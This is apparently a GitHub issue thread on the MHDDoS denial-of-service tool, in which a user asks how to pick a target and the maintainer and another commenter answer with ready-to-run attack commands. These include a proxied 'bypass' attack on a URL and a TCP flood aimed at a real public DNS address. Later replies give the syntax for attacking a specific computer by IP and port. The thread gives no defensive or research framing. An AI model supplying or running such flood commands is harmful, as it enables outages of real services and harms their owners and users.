### ISSUE TITLE
How to choose target?

### ISSUE THREAD

**Issue by 2-bithacker** [MHProDev/MHDDoS#75]
It doesn't ever give me an option to pick a target.  It just says "attack started".

**Comment by MHProDev** [comment]
command line ?

**Comment by bntr00t** [comment]
python3 start.py bypass https://example.com 5 1000 socks5.txt 100 100

**Comment by 2-bithacker** [comment]
can I do an attack not on sites, but with a ip and protocol?

**Comment by bntr00t** [comment]
python3 start.py method ip:port proxytype(1,4,5) 1000 proxy.txt 100 100

**Comment by FortniBloxYT1** [comment]
my script is better

**Comment by 2-bithacker** [comment]
ok

**Comment by MHProDev** [comment]
python3 start.py <method> <ip:port> <threads> <durction>
python3 start.py TCP 8.8.8.8:53 100 1000

**Comment by 2-bithacker** [comment]
How long does it take to start working?  I am testing it on one of my servers and the system usage is normal.  Do the threads have something to do with it?

**Comment by 2-bithacker** [comment]
Can I just attack a specific ip without all the other stuff?

**Comment by 2-bithacker** [comment]
Like attack a specific computer?

**Comment by MHProDev** [comment]
python3 start.py <method> <ip>:<port> <threads> <durction>
